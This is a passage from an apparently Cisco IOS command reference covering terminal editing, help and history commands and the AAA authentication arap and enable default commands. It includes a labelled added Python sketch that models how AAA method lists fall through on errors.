      Ctrl-K Deletes all characters from the cursor to the end of the command line.
      Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
      Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
      Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the command line.
      Ctrl-V and Esc Q Inserts a code to indicate to the system that the key stroke immediately following should be treated as a command entry, not as an editing key.
      Ctrl-W Deletes the word to the left of the cursor.
      Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
      Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
      Esc B Moves the cursor back one word.
      Esc C Capitalizes the word at the cursor.
      Esc D Deletes from the cursor to the end of the word.
      Esc F Moves the cursor forward one word.
      Esc L Changes the word at the cursor to lowercase.
      Esc U Capitalizes from the cursor to the end of the word.
      Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
       
      Key Function
      Delete or Backspace Erases the character to the left of the cursor.
      Ctrl-W Erases a word.
      Ctrl-U Erases a line.
      Ctrl-R Redisplays a line.
      Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
      Return Executes single-line commands.
      Example
      In the following example, enhanced mode editing is reenabled for the current terminal session:
      terminal editing
      Related Command
      editing
      [12.2.0] terminal full-help (EXEC)
      To get help for the full set of user-level commands, use the terminal full-help EXEC command.
      terminal full-help
      Syntax Description
      This command has no arguments or keywords.
      Default
      Disabled
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The terminal full-help command enables (or disables) a user to see all of the help messages available from the terminal. It is used with the show ? command.
      Example
      The following example is output for show ? with terminal full-help enabled:
      Router> terminal full-help
      Router> show ?
      access-lists List access lists
      appletalk AppleTalk information
      arap Show Appletalk Remote Access statistics
      arp ARP table
      async Information on terminal lines used as router interfaces...
      Related Commands
      full-help
      help
      [12.2.1] terminal history
      To enable the command history feature for the current terminal session or change the size of the command history buffer for the current terminal session, use the terminal history EXEC command. To disable the command history feature or reset the command history buffer to its default size, use the no form of this command.
      terminal history [size number-of-lines]
      terminal no history [size]
      Syntax Description
      size (Optional) Sets command history buffer size.
      number-of-lines (Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.
      Default
      10 lines
      Command Mode
      EXEC
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.0.
      The history command without the size keyword and argument enables the command history feature with the last buffer size specified or the default size. The no history command without the size keyword disables the command history feature. The no history size command resets the buffer size to the default of 10 command lines.
      The history command provides a record of EXEC commands you have entered. This feature is particularly useful to recall long or complex commands or entries, including access lists.
      Key Function
      Ctrl-P or up arrow Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
      Ctrl-N or down arrow1 Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the up arrow. Repeat the key sequence to recall successively more recent commands.
      1 The arrow keys function only with ANSI-compatible terminals such as VT100s.
      Example
      In the following example, the number of command lines recorded is set to 15 for the local line:
      terminal history size 15
      Related Commands
      history
      show history
      [12.2.2] Network Access Security Commands
      This chapter describes the commands used to manage security on the network.
      [12.2.3] aaa authentication arap
      To enable an Authentication Authorization and Accounting (AAA) authentication method for AppleTalk Remote Access (ARA) users using TACACS+, use the aaa authentication arap global configuration command. Use the no form of this command to disable this authentication.
      aaa authentication arap {default | list-name} method1 [...[method4]]
      no aaa authentication arap {default | list-name} method1 [...[method4]]
      Syntax Description
      default Uses the listed methods that follow this argument as the default list of methods when a user logs in.
      list-name Character string used to name the following list of authentication methods tried when a user logs in.
      method One of the keywords described in Table 1.
      Default
      If the default list is not set, only the local user database is checked. This version has the same effect as the following command:
      aaa authentication arap default local
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      The list names and default that you set with the aaa authentication arap command are used with the arap authentication command. These lists can contain up to four authentication methods that are used when a user tries to log in with ARA. Note that ARAP guest logins are disabled by default when you enable AAA/TACACS+. To allow guest logins, you must use either the guest or auth-guest method listed in Table 1. You can only use one of these methods; they are mutually exclusive.
      Create a list by entering the aaa authentication arap list-name method command, where list-name is any character string used to name this list (such as MIS-access.) The method argument identifies the list of methods the authentication algorithm tries in the given sequence. You can enter up to four methods.
      Use the show running-config command to view lists of authentication methods.
      Table 1 AAA Authentication ARAP Methods
      Keyword Description
      guest Allows guest logins. This method must be the first method listed, but it can be followed by other methods if it does not succeed.
      auth-guest Allows guest logins only if the user has already logged in to EXEC. This method must be the first method listed, but can be followed by other methods if it does not succeed.
      line Uses the line password for authentication.
      local Uses the local username database for authentication.
      tacacs+ Uses TACACS+ authentication.
      radius Uses RADIUS authentication.
      Note This command cannot be used with TACACS or extended TACACS.
      Examples
      The following example creates a list called MIS-access, which first tries TACACS+ authentication and then none:
      aaa authentication arap MIS-access tacacs+ none
      The following example creates the same list, but sets it as the default list that is used for all ARA protocol authentications if no other list is specified:
      aaa authentication arap default tacacs+ none
      Related Commands
      aaa authentication local-override
      aaa new-model
      [12.2.4] aaa authentication enable default
      To enable AAA authentication to determine if a user can access the privileged command level, use the aaa authentication enable default global configuration command. Use the no form of this command to disable this authorization method.
      aaa authentication enable default method1 [...[method4]]
      no aaa authentication enable default method1 [...[method4]]
      Syntax Description
      method At least one and up to four of the keywords described in Table 2.
      Default
      If the default list is not set, only the enable password is checked. This version has the same effect as the following command:
      aaa authentication enable default enable
      On the console, the enable password is used if it exists. If no password is set, the process will succeed anyway.
      Command Mode
      Global configuration
      Usage Guidelines
      This command first appeared in Cisco IOS Release 10.3.
      Use the aaa authentication enable default command to create a series of authentication methods that are used to determine whether a user can access the privileged command level. You can specify up to four authentication methods. Method keywords are described in Table 2. The additional methods of authentication are used only if the previous method returns an error, not if it fails. To specify that the authentication should succeed even if all methods return an error, specify none as the final method in the command line.
      If a default authentication routine is not set for a function, the default is none and no authentication is performed. Use the show running-config command to view currently configured lists of authentication methods.
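      The method-list evaluation described in the usage guidelines for aaa authentication arap and aaa authentication enable default, as an added example that is not part of the original page or of Cisco's code: the method functions, the user database, the accepted credentials and the server reachability flags are constructed assumptions.

```python
# Added model of IOS AAA method-list evaluation; illustration only, not Cisco
# code.  Each method returns PASS, FAIL or ERROR.  The list advances to the
# next method only on ERROR (server unreachable); a FAIL (rejected) is final.
PASS, FAIL, ERROR = "PASS", "FAIL", "ERROR"

def local_method(user_db):
    """The 'local' keyword: check the local username database."""
    def check(user, password):
        return PASS if user_db.get(user) == password else FAIL
    return check

def tacacs_method(reachable, accepted):
    """The 'tacacs+' keyword: ERROR when no server answers, else PASS/FAIL."""
    def check(user, password):
        if not reachable:
            return ERROR
        return PASS if (user, password) in accepted else FAIL
    return check

def none_method(user, password):
    """The 'none' keyword: no authentication, always PASS."""
    return PASS

def evaluate(methods, user, password):
    """Walk a method list; return (verdict, index of the deciding method).
    Every method returning ERROR without a trailing 'none' means denial."""
    for index, method in enumerate(methods):
        verdict = method(user, password)
        if verdict != ERROR:
            return verdict, index
    return FAIL, len(methods)

def demo():
    """Constructed sample data (not from the page) for the lists discussed."""
    accepted = {("alice", "s3cret")}
    # aaa authentication arap MIS-access tacacs+ none, server reachable
    server_up = [tacacs_method(True, accepted), none_method]
    # the same list while the TACACS+ server is unreachable
    server_down = [tacacs_method(False, accepted), none_method]
    # tacacs+ local: an unreachable server falls back to the local database
    # rather than to 'none', so a wrong password is still rejected
    with_local = [tacacs_method(False, accepted),
                  local_method({"admin": "hunter2"})]
    return {
        "up_bad_pw": evaluate(server_up, "alice", "wrong"),      # ('FAIL', 0)
        "up_good_pw": evaluate(server_up, "alice", "s3cret"),    # ('PASS', 0)
        "down_bad_pw": evaluate(server_down, "alice", "wrong"),  # ('PASS', 1)
        "down_local": evaluate(with_local, "alice", "wrong"),    # ('FAIL', 1)
    }
```

The down_bad_pw case is the fail-open behaviour the guidelines warn about: a rejected password never reaches none, but an unreachable server does.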
      Table 2 AAA Authentication Enable Default Methods ]

